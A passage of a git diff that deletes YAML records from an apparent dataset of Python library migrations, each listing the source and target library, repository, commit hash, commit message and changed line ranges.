petisco/extra/slack/is_slack_available.py - lines: - - '3:3' -- filepath: petisco/extra/slack/application/notifier/slack_notifier.py - lines: - - 3-4:3-4 diff --git a/v1/data/migration/9c85d66_pil,pillow.yaml b/v1/data/migration/9c85d66_pil,pillow.yaml deleted file mode 100644 index 42086db..0000000 --- a/v1/data/migration/9c85d66_pil,pillow.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: 9c85d66_pil,pillow -source: pil -target: pillow -repo: thunder-project/thunder -commit: 9c85d66c14f1c7b39e8efd39dd7fba9163d7efca -pair_id: pil,pillow -commit_message: Replaced PIL with pillow -commit_url: https://github.com/thunder-project/thunder/commit/9c85d66c -code_changes: [] diff --git a/v1/data/migration/a4c347a_eventlet,gevent.yaml b/v1/data/migration/a4c347a_eventlet,gevent.yaml deleted file mode 100644 index 5157af8..0000000 --- a/v1/data/migration/a4c347a_eventlet,gevent.yaml +++ /dev/null @@ -1,12 +0,0 @@ -id: a4c347a_eventlet,gevent -source: eventlet -target: gevent -repo: stefal/rtkbase -commit: a4c347a2ede5fba1d0e787193b7dc4079ab4fd6f -pair_id: eventlet,gevent -commit_message: 'Temporary workaround to #22' -commit_url: https://github.com/stefal/rtkbase/commit/a4c347a2 -code_changes: -- filepath: web_app/server.py - lines: - - 28-29:26-27 diff --git a/v1/data/migration/a50812d_flask-security,flask-security-too.yaml b/v1/data/migration/a50812d_flask-security,flask-security-too.yaml deleted file mode 100644 index 1401917..0000000 --- a/v1/data/migration/a50812d_flask-security,flask-security-too.yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: a50812d_flask-security,flask-security-too -source: flask-security -target: flask-security-too -repo: italomaia/flask-empty -commit: a50812d36c5249ac2a1cd7e580283de06d2aa727 -pair_id: flask-security,flask-security-too -commit_message: 'Migrating dependency on flask-security to flask-security-too - - - As seen in https://github.com/mattupstate/flask-security/issues/822 flask-security - - became abandonware. A fork mantained by jwag956 seems to handle the project''s continuity. - - I took a look in the source code and it seems to be properly maintained.' -commit_url: https://github.com/italomaia/flask-empty/commit/a50812d3 -code_changes: [] diff --git a/v1/data/migration/a5c04bb_requests,aiohttp.yaml b/v1/data/migration/a5c04bb_requests,aiohttp.yaml deleted file mode 100644 index 09beb6c..0000000 --- a/v1/data/migration/a5c04bb_requests,aiohttp.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: a5c04bb_requests,aiohttp -source: requests -target: aiohttp -repo: talkpython/async-techniques-python-course -commit: a5c04bbd9b5614a8fc0317050c01e4c241b1b41d -pair_id: requests,aiohttp -commit_message: fully async flask app based on quart and aiohttp -commit_url: https://github.com/talkpython/async-techniques-python-course/commit/a5c04bbd -code_changes: -- filepath: src/10-async-web/acityscape_api/services/location_service.py - lines: - - '4:5' - - 21:22-23 - - '24:26' -- filepath: src/10-async-web/acityscape_api/services/weather_service.py - lines: - - '1:1' - - 13:13-14 - - '16:17' -- filepath: src/10-async-web/acityscape_api/services/sun_service.py - lines: - - '5:5' - - 21:21-22 - - '24:24' diff --git a/v1/data/migration/a688034_flask-restplus,flask-restx.yaml b/v1/data/migration/a688034_flask-restplus,flask-restx.yaml deleted file mode 100644 index ea08d8a..0000000 --- a/v1/data/migration/a688034_flask-restplus,flask-restx.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: a688034_flask-restplus,flask-restx -source: flask-restplus -target: flask-restx -repo: cycat-project/cycat-service -commit: a6880349b111f7a111d6d9163dde664251eaa0e4 -pair_id: flask-restplus,flask-restx -commit_message: 'fix: [requirements] flask-restx added' -commit_url: https://github.com/cycat-project/cycat-service/commit/a6880349 -code_changes: [] diff --git a/v1/data/migration/a7375cc_celery,rq.yaml b/v1/data/migration/a7375cc_celery,rq.yaml deleted file mode 100644 index f3235b1..0000000 --- a/v1/data/migration/a7375cc_celery,rq.yaml +++ /dev/null @@ -1,12 +0,0 @@ -id: a7375cc_celery,rq -source: celery -target: rq -repo: sapfir0/premier-eye -commit: a7375ccc40885f04faf4a05852591e6de4ba676d -pair_id: celery,rq -commit_message: "\u041F\u0435\u0440\u0435\u0434\u0435\u043B\u0430\u043A\u0430" -commit_url: https://github.com/sapfir0/premier-eye/commit/a7375ccc -code_changes: -- filepath: pyfront/app/__init__.py - lines: - - '2:3' diff --git a/v1/data/migration/a7f4c3f_pymilvus-orm,pymilvus.yaml b/v1/data/migration/a7f4c3f_pymilvus-orm,pymilvus.yaml deleted file mode 100644 index b202f6d..0000000 --- a/v1/data/migration/a7f4c3f_pymilvus-orm,pymilvus.yaml +++ /dev/null @@ -1,12 +0,0 @@ -id: a7f4c3f_pymilvus-orm,pymilvus -source: pymilvus-orm -target: pymilvus -repo: milvus-io/bootcamp -commit: a7f4c3f13e007116d88d9a2776f471a4e4f1fc81 -pair_id: pymilvus-orm,pymilvus -commit_message: update qa-chatbot to Milvus2.0.0-rc5 -commit_url: https://github.com/milvus-io/bootcamp/commit/a7f4c3f1 -code_changes: -- filepath: solutions/question_answering_system/quick_deploy/server/src/milvus_helpers.py - lines: - - 2-5,7:2 diff --git a/v1/data/migration/aa607bd_flask,quart.yaml b/v1/data/migration/aa607bd_flask,quart.yaml deleted file mode 100644 index cd68187..0000000 --- a/v1/data/migration/aa607bd_flask,quart.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: aa607bd_flask,quart -source: flask -target: quart -repo: talkpython/async-techniques-python-course -commit: aa607bd32a90d7693e91bd4a1be39baec2d889ba -pair_id: flask,quart -commit_message: Final code for first conversion from flask to quart (no real async - yet) -commit_url: https://github.com/talkpython/async-techniques-python-course/commit/aa607bd3 -code_changes: -- filepath: src/10-async-web/acityscape_api/app.py - lines: - - '1:1' - - '9:9' -- filepath: src/10-async-web/acityscape_api/views/home.py - lines: - - '1:1' - - '3:3' - - '15:15' -- filepath: src/10-async-web/acityscape_api/views/city_api.py - lines: - - '1:1' - - '4:4' - - 11-12:11-12 - - 20-21:20-21 diff --git a/v1/data/migration/ab4e5fd_requests,aiohttp.yaml b/v1/data/migration/ab4e5fd_requests,aiohttp.yaml deleted file mode 100644 index 1d7d359..0000000 --- a/v1/data/migration/ab4e5fd_requests,aiohttp.yaml +++ /dev/null @@ -1,14 +0,0 @@ -id: ab4e5fd_requests,aiohttp -source: requests -target: aiohttp -repo: talkpython/async-techniques-python-course -commit: ab4e5fdd32982c97e9701d3e1fdb8c39882d4250 -pair_id: requests,aiohttp -commit_message: final code for web scraping with asyncio. -commit_url: https://github.com/talkpython/async-techniques-python-course/commit/ab4e5fdd -code_changes: -- filepath: src/04-asyncio/web_scraping/async_scrape/program.py - lines: - - '1:3' - - 10:13-14 - - '13:17' diff --git a/v1/data/migration/ae216dd_pycrypto,pycryptodome.yaml b/v1/data/migration/ae216dd_pycrypto,pycryptodome.yaml deleted file mode 100644 index f71bbdc..0000000 --- a/v1/data/migration/ae216dd_pycrypto,pycryptodome.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: ae216dd_pycrypto,pycryptodome -source: pycrypto -target: pycryptodome -repo: wh1te909/tacticalrmm -commit: ae216dd41d81c06bd5f7cad2bfef61f5c4843744 -pair_id: pycrypto,pycryptodome -commit_message: replace pycrypto with newer pycryptodome -commit_url: https://github.com/wh1te909/tacticalrmm/commit/ae216dd4 -code_changes: [] diff --git a/v1/data/migration/b19aae1_pycrypto,pycryptodome.yaml b/v1/data/migration/b19aae1_pycrypto,pycryptodome.yaml deleted file mode 100644 index f7cd7e6..0000000 --- a/v1/data/migration/b19aae1_pycrypto,pycryptodome.yaml +++ /dev/null @@ -1,12 +0,0 @@ -id: b19aae1_pycrypto,pycryptodome -source: pycrypto -target: pycryptodome -repo: bitshares/python-bitshares -commit: b19aae1aca63b454c4ae756ddf045d99a7a2d8f5 -pair_id: pycrypto,pycryptodome -commit_message: 'pycryptodome & readme updates - - - pycrypto has been depreciated & replaced with pycryptodome.' -commit_url: https://github.com/bitshares/python-bitshares/commit/b19aae1a -code_changes: [] diff --git a/v1/data/migration/b2c9313_requests,aiohttp.yaml b/v1/data/migration/b2c9313_requests,aiohttp.yaml deleted file mode 100644 index f993e30..0000000 --- a/v1/data/migration/b2c9313_requests,aiohttp.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: b2c9313_requests,aiohttp -source: requests -target: aiohttp -repo: sabeechen/hassio-google-drive-backup -commit: b2c93130aee27ab377460ed9375b5cd89c35a44c -pair_id: requests,aiohttp -commit_message: Add asyncio requirements -commit_url: https://github.com/sabeechen/hassio-google-drive-backup/commit/b2c93130 -code_changes: [] diff --git a/v1/data/migration/b687d20_huey,celery.yaml b/v1/data/migration/b687d20_huey,celery.yaml deleted file mode 100644 index 0955b40..0000000 --- a/v1/data/migration/b687d20_huey,celery.yaml +++ /dev/null @@ -1,15 +0,0 @@ -id: b687d20_huey,celery -source: huey -target: celery -repo: lonelam/onlinejudgeshu -commit: b687d2067b28f6759a47ddcfe7bb575e8f83f679 -pair_id: huey,celery -commit_message: "\u5E9F\u5F03 huey\uFF0C\u591A\u6570\u636E\u5E93\u8FDE\u63A5\u7684\ - \u65F6\u5019\u5B58\u5728 connection \u65E0\u6CD5\u91CA\u653E\u7684\u95EE\u9898\uFF0C\ - \u56DE\u5230 celery" -commit_url: https://github.com/lonelam/onlinejudgeshu/commit/b687d206 -code_changes: -- filepath: submission/tasks.py - lines: - - '2:3' - - '7:7' diff --git a/v1/data/migration/b86b375_raven,sentry-sdk.yaml b/v1/data/migration/b86b375_raven,sentry-sdk.yaml deleted file mode 100644 index fd58864..0000000 --- a/v1/data/migration/b86b375_raven,sentry-sdk.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: b86b375_raven,sentry-sdk -source: raven -target: sentry-sdk -repo: thespaghettidetective/thespaghettidetective -commit: b86b375952cc3e965c32201caa8094998c56cde7 -pair_id: raven,sentry-sdk -commit_message: Upgrade to Python 3.8 so that sentry will work with django channels - 2 -commit_url: https://github.com/thespaghettidetective/thespaghettidetective/commit/b86b3759 -code_changes: -- filepath: web/app/notifications.py - lines: - - '13:13' - - '44:44' - - '49:49' - - '54:54' - - 60:60 - - 66:66 - - 250:250 - - 256:256 - - 262:262 - - 268:268 diff --git a/v1/data/migration/b955ac9_ruamel.yaml,pyyaml.yaml b/v1/data/migration/b955ac9_ruamel.yaml,pyyaml.yaml deleted file mode 100644 index 2c150fb..0000000 --- a/v1/data/migration/b955ac9_ruamel.yaml,pyyaml.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: b955ac9_ruamel.yaml,pyyaml -source: ruamel.yaml -target: pyyaml -repo: microsoft/nni -commit: b955ac99a46094d2d701d447e9df07509767cc32 -pair_id: ruamel.yaml,pyyaml -commit_message: Use PyYAML instead of ruamel.yaml (#3702) -commit_url: https://github.com/microsoft/nni/commit/b955ac99 -code_changes: -- filepath: nni/tools/nnictl/common_utils.py - lines: - - '12:12' -- filepath: test/nni_test/nnitest/utils.py - lines: - - '12:12' - - '46:46' - - '51:51' -- filepath: nni/experiment/config/common.py - lines: - - '8:8' - - 121:121 -- filepath: test/nni_test/nnitest/run_tests.py - lines: - - '12:12' - - 83:83 -- filepath: nni/experiment/config/base.py - lines: - - '9:9' - - 75:75 -- filepath: nni/tools/package_utils/__init__.py - lines: - - '9:9' - - 218:218 - - 229:229 diff --git a/v1/data/migration/b9b65c0_pyyaml,ruamel.yaml.yaml b/v1/data/migration/b9b65c0_pyyaml,ruamel.yaml.yaml deleted file mode 100644 index c4bd035..0000000 --- a/v1/data/migration/b9b65c0_pyyaml,ruamel.yaml.yaml +++ /dev/null @@ -1,119 +0,0 @@ -id: b9b65c0_pyyaml,ruamel.yaml -source: pyyaml -target: ruamel.yaml -repo: common-workflow-language/cwltool -commit: b9b65c0f4d7531c8a97690356ecf1a34214eaac2 -pair_id: pyyaml,ruamel.yaml -commit_message: 'Squashed ''cwltool/schemas/'' changes from f027dbb..d03b190 - - - d03b190 Introducing refScope and typeDSL into CWL schema - - 5e1e438 Merge commit ''851b3c1302aa5b5d8a80f74c5732a617f62acefe'' into scoped-ref-and-typedsl - - 851b3c1 Split minimal base types used in CWL into metaschema_base.yml - - 510a01f Merge commit ''8823aaa11432aa042b3e307891e71ee13e11bfd7'' into scoped-ref-and-typedsl - - 8823aaa Adjust ref scopes - - 3431e18 Use scopedRef and typeDSL in metaschema - - 1e6dab6 Using typeDSL in metaschema. - - 3055f70 Update bootstrap context. - - 31db28e Merge branch ''master'' into type_dsl. Add test for typeDSL. - - 116d9e4 Merge branch ''resolve_all_refactor'' - - 8072bf5 "type" DSL wip - - 33ef215 Refactor resolve_all into smaller methods. - - ad8a111 Merge pull request #28 from common-workflow-language/scoped_ref - - 5aadf27 fix types - - 4ef52be Improve documentation. Add feature of skipping some inner scopes. - - c6d4a7b Reworking refScope to be fixed instead of search based. - - ae0ef4e Remove explicit calls to validate_links since it is folded into resolve_all(). - - 2fa6bfb update types - - e5d4730 New test for scoped ref that better reflects actual desired behavior. - - efbc9c4 Add scopedRef to metaschema. Tweak test. - - 9fcd67d Fold link validation into resolve_all() and resolve scoped identifiers. - - f36f52f Merge pull request #219 from denis-yuen/patch-1 - - da10eec always be updating (mypy-lang) - - e1e17ea upgrade Jenkins setuptools - - 563e5ef fix jenkins build - - 11b45b5 Merge pull request #224 from common-workflow-language/jenkins-link - - b4d790d Backport fixes to draft-3 - - 1ea9a5c add jenkins link - - 180a21e Corrections and test data - - f0ac285 Merge branch ''master'' of github.com:common-workflow-language/schema_salad - - 84738f1 better RDF schema error handling (#26) - - 3b8dc09 mypy 0.4 is out (#25) - - 5316da0 Add missing files for site generation. - - 31fbb76 Fix site generation workflows to specify draft-3 - - cff09a0 Add link to latest User Guide on front page - - 53b2ad7 Merge pull request #200 from common-workflow-language/draft-4 - - 089fbd7 start documenting the draft-4 changes - - 8c5bda0 Fix mapSubject fields when $import or $include is provided. - - 5b969ca fix diff-cover - - d798a7e split out mypy - - f43fa45 Fix tests - - 2d0398e Bump version. - - aeab7c3 Merge branch ''master'' of github.com:common-workflow-language/schema_salad - - e381f64 Return metaschema loader from load_schema. Don''t crash expanding identifier - fields when value is not a string. - - 15dae9f enhance CI - - fd2fcb3 more type checking (#21) - - c51c723 enable rdfa schema format (#22) - - ff192e8 turn off py3 support for now (#19) - - 0c5dba5 measure code coverage (#12) - - 2514a23 switch to ruamel.yaml, use C loader if available, only load safely (#20) - - - git-subtree-dir: cwltool/schemas - - git-subtree-split: d03b19017e35326ee753f6ca82d9bc4a56d44b99' -commit_url: https://github.com/common-workflow-language/cwltool/commit/b9b65c0f -code_changes: -- filepath: draft-4/salad/schema_salad/jsonld_context.py - lines: - - '3:4' diff --git a/v1/data/migration/baca6bb_urllib,urllib3.yaml b/v1/data/migration/baca6bb_urllib,urllib3.yaml deleted file mode 100644 index 1609a1f..0000000 --- a/v1/data/migration/baca6bb_urllib,urllib3.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: baca6bb_urllib,urllib3 -source: urllib -target: urllib3 -repo: thehive-project/cortex-analyzers -commit: baca6bbf601ae74d188cf8b483ccf4864f300d9c -pair_id: urllib,urllib3 -commit_message: changed requirements to urllib3 -commit_url: https://github.com/thehive-project/cortex-analyzers/commit/baca6bbf -code_changes: [] diff --git a/v1/data/migration/bbeb755_scapy-python3,scapy.yaml b/v1/data/migration/bbeb755_scapy-python3,scapy.yaml deleted file mode 100644 index 636f2fc..0000000 --- a/v1/data/migration/bbeb755_scapy-python3,scapy.yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: bbeb755_scapy-python3,scapy -source: scapy-python3 -target: scapy -repo: danimtb/dasshio -commit: bbeb755a01d6092258a572e456b9e95bd2530328 -pair_id: scapy-python3,scapy -commit_message: 'Update scapy - - - scapy-python3 is an unofficial fork that is getting very oudated (many bug fixes - missing). - - Migrates to original and up-to-date scapy, which now supports both python 2 and - 3' -commit_url: https://github.com/danimtb/dasshio/commit/bbeb755a -code_changes: [] diff --git a/v1/data/migration/bed73dc_urllib,urllib3.yaml b/v1/data/migration/bed73dc_urllib,urllib3.yaml deleted file mode 100644 index 3a992bf..0000000 --- a/v1/data/migration/bed73dc_urllib,urllib3.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: bed73dc_urllib,urllib3 -source: urllib -target: urllib3 -repo: cyberreboot/vent -commit: bed73dc079dace87f73de7dc9fd59e4128b45cb6 -pair_id: urllib,urllib3 -commit_message: urllib3 -commit_url: https://github.com/cyberreboot/vent/commit/bed73dc0 -code_changes: [] diff --git a/v1/data/migration/c08ec7a_huey,celery.yaml b/v1/data/migration/c08ec7a_huey,celery.yaml deleted file mode 100644 index f12019e..0000000 --- a/v1/data/migration/c08ec7a_huey,celery.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: c08ec7a_huey,celery -source: huey -target: celery -repo: lonelam/onlinejudgeshu -commit: c08ec7a2dc084cd75cfe2f3327d6a044307e4f21 -pair_id: huey,celery -commit_message: "\u4FEE\u6539 admin \u754C\u9762\uFF0Cip \u592A\u5BBD\u4E86\n\nmonitor\ - \ \u4E0D\u518D\u4F7F\u7528\uFF0C\u914D\u7F6E\u5224\u9898\u670D\u52A1\u5668\u7684\ - \u4EE3\u7801\u79FB\u5165 judge_dispatcher \u91CC\u9762\n\n\u6DFB\u52A0\u524D\u7AEF\ - \u540E\u53F0\u5224\u9898\u670D\u52A1\u5668\u7BA1\u7406\u9875\u9762\u4E00\u4E9B\u6821\ - \u9A8C\u7684\u529F\u80FD\n\n\u53BB\u6389\u5224\u9898\u670D\u52A1\u5668\u76D1\u63A7\ - \u7684\u524D\u7AEF\u548C\u540E\u7AEF\n\n\u4FEE\u590D\u6BD4\u8D5B first ac \u663E\ - \u793A\u9519\u8BEF\u7684\u95EE\u9898\n\n\u4FEE\u590D\u4E24\u6B65\u9A8C\u8BC1\u4E2D\ - \u7684\u9519\u8BEF\n\ntfa \u663E\u793A url\n\n\u589E\u52A0 qrcode \u4F9D\u8D56\n\ - \n\u5B8C\u6210\u4E24\u6B65\u9A8C\u8BC1\u7684\u903B\u8F91\n\nfix error package name\ - \ and add pip mirrorwq\n\n\u5E9F\u5F03 huey\uFF0C\u591A\u6570\u636E\u5E93\u8FDE\u63A5\ - \u7684\u65F6\u5019\u5B58\u5728 connection \u65E0\u6CD5\u91CA\u653E\u7684\u95EE\u9898\ - \uFF0C\u56DE\u5230 celery\n\n\u4FEE\u590D huey \u961F\u5217\u4E0D\u4F1A\u91CA\u653E\ - \u6570\u636E\u5E93\u8FDE\u63A5\u7684\u95EE\u9898\uFF0C\u662F\u7528\u6CD5\u4E0D\u5BF9\ - \n\n\u589E\u52A0\u5173\u95ED\u4E24\u6B65\u9A8C\u8BC1\u7684 api\n\n\u589E\u52A0\u4E24\ - \u6B65\u9A8C\u8BC1\u57FA\u7840\u4EE3\u7801\n\n\u5B8C\u5584 sso \u767B\u5F55\u90E8\ - \u5206\n\n\u89C4\u8303\u914D\u7F6E\u6587\u4EF6\u5199\u6CD5\uFF1B\u6570\u636E\u5E93\ - \u7528\u6237\u540D\u4E5F\u5728\u73AF\u5883\u53D8\u91CF\u4E2D\u53D6\n\n\u4E2A\u4EBA\ - \u535A\u5BA2\u94FE\u63A5\u524D\u9762\u4E5F\u589E\u52A0\u56FE\u6807\n\n\u4FEE\u6539\ - \u5224\u9898\u673A\u5668\u7684\u914D\u7F6E\u6587\u4EF6\n\n\u5220\u9664\u4E0D\u518D\ - \u4F7F\u7528\u7684\u914D\u7F6E\u6587\u4EF6\n\nSquash from a1fff74 to 12f96c6 by\ - \ virusdefender" -commit_url: https://github.com/lonelam/onlinejudgeshu/commit/c08ec7a2 -code_changes: [] diff --git a/v1/data/migration/c77913a_eventlet,gevent.yaml b/v1/data/migration/c77913a_eventlet,gevent.yaml deleted file mode 100644 index 5a21eb0..0000000 --- a/v1/data/migration/c77913a_eventlet,gevent.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: c77913a_eventlet,gevent -source: eventlet -target: gevent -repo: it3s/mootiro-maps -commit: c77913a45e3400e9e3f49dd4340e81a16a6c131f -pair_id: eventlet,gevent -commit_message: changed eventlet for gevent -commit_url: https://github.com/it3s/mootiro-maps/commit/c77913a4 -code_changes: [] diff --git a/v1/data/migration/c7c5a13_raven,sentry-sdk.yaml b/v1/data/migration/c7c5a13_raven,sentry-sdk.yaml deleted file mode 100644 index b0648ae..0000000 --- a/v1/data/migration/c7c5a13_raven,sentry-sdk.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: c7c5a13_raven,sentry-sdk -source: raven -target: sentry-sdk -repo: line/promgen -commit: c7c5a138e4592aa1f0fa182ca1f8b971afaf7156 -pair_id: raven,sentry-sdk -commit_message: '[INTERNAL] Switch from raven to sentry_sdk' -commit_url: https://github.com/line/promgen/commit/c7c5a138 -code_changes: [] diff --git a/v1/data/migration/cbaf252_python-ldap,ldap3.yaml b/v1/data/migration/cbaf252_python-ldap,ldap3.yaml deleted file mode 100644 index 909b518..0000000 --- a/v1/data/migration/cbaf252_python-ldap,ldap3.yaml +++ /dev/null @@ -1,14 +0,0 @@ -id: cbaf252_python-ldap,ldap3 -source: python-ldap -target: ldap3 -repo: cloud-custodian/cloud-custodian -commit: cbaf252ff1eb554511b0384392ea02387887ed6c -pair_id: python-ldap,ldap3 -commit_message: "replace Python-LDAP with ldap3 (#690)\n\n* fix args in mailer\u2019\ - s setup.py\n\n* switch mailer to ldap3\n\nclose #637\n\n* check that manager was\ - \ set" -commit_url: https://github.com/cloud-custodian/cloud-custodian/commit/cbaf252f -code_changes: -- filepath: tools/c7n_mailer/c7n_mailer/address.py - lines: - - 19:16-20 diff --git a/v1/data/migration/cc47b42_python-ldap,ldap3.yaml b/v1/data/migration/cc47b42_python-ldap,ldap3.yaml deleted file mode 100644 index 08b300c..0000000 --- a/v1/data/migration/cc47b42_python-ldap,ldap3.yaml +++ /dev/null @@ -1,14 +0,0 @@ -id: cc47b42_python-ldap,ldap3 -source: python-ldap -target: ldap3 -repo: ictu/quality-time -commit: cc47b42cf70b6968b22a3819bf0b9714135271c1 -pair_id: python-ldap,ldap3 -commit_message: 'Issue #679 ldap3 library implemented instead of python_ldap (#703)' -commit_url: https://github.com/ictu/quality-time/commit/cc47b42c -code_changes: -- filepath: components/server/src/routes/auth.py - lines: - - 11:13-14 - - 47:66 - - 50-51:73 diff --git a/v1/data/migration/cdaff15_pycrypto,cryptography.yaml b/v1/data/migration/cdaff15_pycrypto,cryptography.yaml deleted file mode 100644 index 45335da..0000000 --- a/v1/data/migration/cdaff15_pycrypto,cryptography.yaml +++ /dev/null @@ -1,12 +0,0 @@ -id: cdaff15_pycrypto,cryptography -source: pycrypto -target: cryptography -repo: freeopcua/opcua-asyncio -commit: cdaff1575780a99ab035abb08a6ad13414cd4859 -pair_id: pycrypto,cryptography -commit_message: completely remove dependency to pycrypto -commit_url: https://github.com/freeopcua/opcua-asyncio/commit/cdaff157 -code_changes: -- filepath: opcua/uacrypto.py - lines: - - 8-15:3-7 diff --git a/v1/data/migration/cdb6679_pil,pillow.yaml b/v1/data/migration/cdb6679_pil,pillow.yaml deleted file mode 100644 index 5631f91..0000000 --- a/v1/data/migration/cdb6679_pil,pillow.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: cdb6679_pil,pillow -source: pil -target: pillow -repo: fantomas42/django-blog-zinnia -commit: cdb667907dc2aa943955df49c4d4a604b4ecd195 -pair_id: pil,pillow -commit_message: using Pillow 2.0 for Python 2 & 3 compatibility -commit_url: https://github.com/fantomas42/django-blog-zinnia/commit/cdb66790 -code_changes: [] diff --git a/v1/data/migration/cec78f4_pil,pillow.yaml b/v1/data/migration/cec78f4_pil,pillow.yaml deleted file mode 100644 index 90fbb2a..0000000 --- a/v1/data/migration/cec78f4_pil,pillow.yaml +++ /dev/null @@ -1,12 +0,0 @@ -id: cec78f4_pil,pillow -source: pil -target: pillow -repo: numenta/nupic -commit: cec78f4f639b51c9b59050b68f2b014a299d7c33 -pair_id: pil,pillow -commit_message: 'replace PIL with Pillow - - - Pillow is a fork of PIL, with newer features and more (pip) packaging friendly.' -commit_url: https://github.com/numenta/nupic/commit/cec78f4f -code_changes: [] diff --git a/v1/data/migration/cf856c0_gevent,eventlet.yaml b/v1/data/migration/cf856c0_gevent,eventlet.yaml deleted file mode 100644 index b99af42..0000000 --- a/v1/data/migration/cf856c0_gevent,eventlet.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: cf856c0_gevent,eventlet -source: gevent -target: eventlet -repo: stefal/rtkbase -commit: cf856c0cc9cbb0f810d59c9419f8789a1f9f5a80 -pair_id: gevent,eventlet -commit_message: 'Switching back to eventlet - - I can''t use gevent because: - - - I can''t install it on an orange pi zero with only 256MB ram - - - It breaks the satellite and location broadcast thread #29 - - - Adding pyopenssl to fix #22 doesn''t help, I had to add pyopenssl AND switch from - urllib to requests - - - fix #29 - - fix #22' -commit_url: https://github.com/stefal/rtkbase/commit/cf856c0c -code_changes: -- filepath: web_app/server.py - lines: - - 26-27:28-29 diff --git a/v1/data/migration/d10cb16_raven,sentry-sdk.yaml b/v1/data/migration/d10cb16_raven,sentry-sdk.yaml deleted file mode 100644 index 9549b99..0000000 --- a/v1/data/migration/d10cb16_raven,sentry-sdk.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: d10cb16_raven,sentry-sdk -source: raven -target: sentry-sdk -repo: weasyl/weasyl -commit: d10cb162447d9e3a9506b76054851863b10ff27a -pair_id: raven,sentry-sdk -commit_message: "Upgrade Sentry client from raven to sentry-sdk\n\nThe API isn\u2019\ - t great and there\u2019s already a workaround for a bug/glaring omission, but the\ - \ library is actively maintained and the new performance/tracing features are nice." -commit_url: https://github.com/weasyl/weasyl/commit/d10cb162 -code_changes: -- filepath: weasyl/middleware.py - lines: - - 316:305 - - 8-9:10 -- filepath: weasyl/define.py - lines: - - 988:979 diff --git a/v1/data/migration/d15540f_gcloud-aio-core,aiohttp.yaml b/v1/data/migration/d15540f_gcloud-aio-core,aiohttp.yaml deleted file mode 100644 index 14926b9..0000000 --- a/v1/data/migration/d15540f_gcloud-aio-core,aiohttp.yaml +++ /dev/null @@ -1,12 +0,0 @@ -id: d15540f_gcloud-aio-core,aiohttp -source: gcloud-aio-core -target: aiohttp -repo: talkiq/gcloud-aio -commit: d15540f94ecdf468b1baf7fd9c025e4f862b3b69 -pair_id: gcloud-aio-core,aiohttp -commit_message: 'feat(taskqueue): migrate to cloudtasks v2beta2 (#13)' -commit_url: https://github.com/talkiq/gcloud-aio/commit/d15540f9 -code_changes: -- filepath: taskqueue/gcloud/aio/taskqueue/taskqueue.py - lines: - - 12-17:6 diff --git a/v1/data/migration/d3a9a16_requests,aiohttp.yaml b/v1/data/migration/d3a9a16_requests,aiohttp.yaml deleted file mode 100644 index 9de5508..0000000 --- a/v1/data/migration/d3a9a16_requests,aiohttp.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: d3a9a16_requests,aiohttp -source: requests -target: aiohttp -repo: ictu/quality-time -commit: d3a9a16a72348cece48c9788cf10db6cc043ec7c -pair_id: requests,aiohttp -commit_message: 'Async collector (#1102) - - - Collector is now asynchronous.' -commit_url: https://github.com/ictu/quality-time/commit/d3a9a16a -code_changes: -- filepath: components/collector/src/base_collectors/source_collector.py - lines: - - 106:101 - - '13:13' -- filepath: components/collector/src/collector_utilities/functions.py - lines: - - '18:18' -- filepath: components/collector/src/collector_utilities/type.py - lines: - - '15:16' - - '5:5' -- filepath: components/collector/src/source_collectors/api_source_collectors/azure_devops.py - lines: - - '12:12' - - '31:31' - - '40:41' - - '52:53' - - 93:93 - - 122:122 - - 133:133 - - 157:158 diff --git a/v1/data/migration/d3bedb7_raven,sentry-sdk.yaml b/v1/data/migration/d3bedb7_raven,sentry-sdk.yaml deleted file mode 100644 index 11ec069..0000000 --- a/v1/data/migration/d3bedb7_raven,sentry-sdk.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: d3bedb7_raven,sentry-sdk -source: raven -target: sentry-sdk -repo: rafalp/misago_docker -commit: d3bedb763bb0d021c7c629423335daaa32b70152 -pair_id: raven,sentry-sdk -commit_message: Update Sentry to SDK -commit_url: https://github.com/rafalp/misago_docker/commit/d3bedb76 -code_changes: [] diff --git a/v1/data/migration/d4119a0_flask-restful,flask-restplus.yaml b/v1/data/migration/d4119a0_flask-restful,flask-restplus.yaml deleted file mode 100644 index 829369d..0000000 --- a/v1/data/migration/d4119a0_flask-restful,flask-restplus.yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: d4119a0_flask-restful,flask-restplus -source: flask-restful -target: flask-restplus -repo: testdrivenio/flask-react-aws -commit: d4119a0f609b151df99b2250e419c168e688a0c6 -pair_id: flask-restful,flask-restplus -commit_message: testing ci -commit_url: https://github.com/testdrivenio/flask-react-aws/commit/d4119a0f -code_changes: -- filepath: services/users/project/api/users/views.py - lines: - - '5:5' -- filepath: services/users/project/api/ping.py - lines: - - '5:4' - - '8:6' diff --git a/v1/data/migration/d54d772_python-social-auth,social-auth-app-django.yaml b/v1/data/migration/d54d772_python-social-auth,social-auth-app-django.yaml deleted file mode 100644 index d24fe5d..0000000 --- a/v1/data/migration/d54d772_python-social-auth,social-auth-app-django.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: d54d772_python-social-auth,social-auth-app-django -source: python-social-auth -target: social-auth-app-django -repo: cmjatai/cmj -commit: d54d772e5ae033845381879baa84a7bbd3ebc727 -pair_id: python-social-auth,social-auth-app-django -commit_message: Adiciona React ao projeto -commit_url: https://github.com/cmjatai/cmj/commit/d54d772e -code_changes: [] diff --git a/v1/data/migration/d6cd8df_pyqt5,pyside6.yaml b/v1/data/migration/d6cd8df_pyqt5,pyside6.yaml deleted file mode 100644 index af7329e..0000000 --- 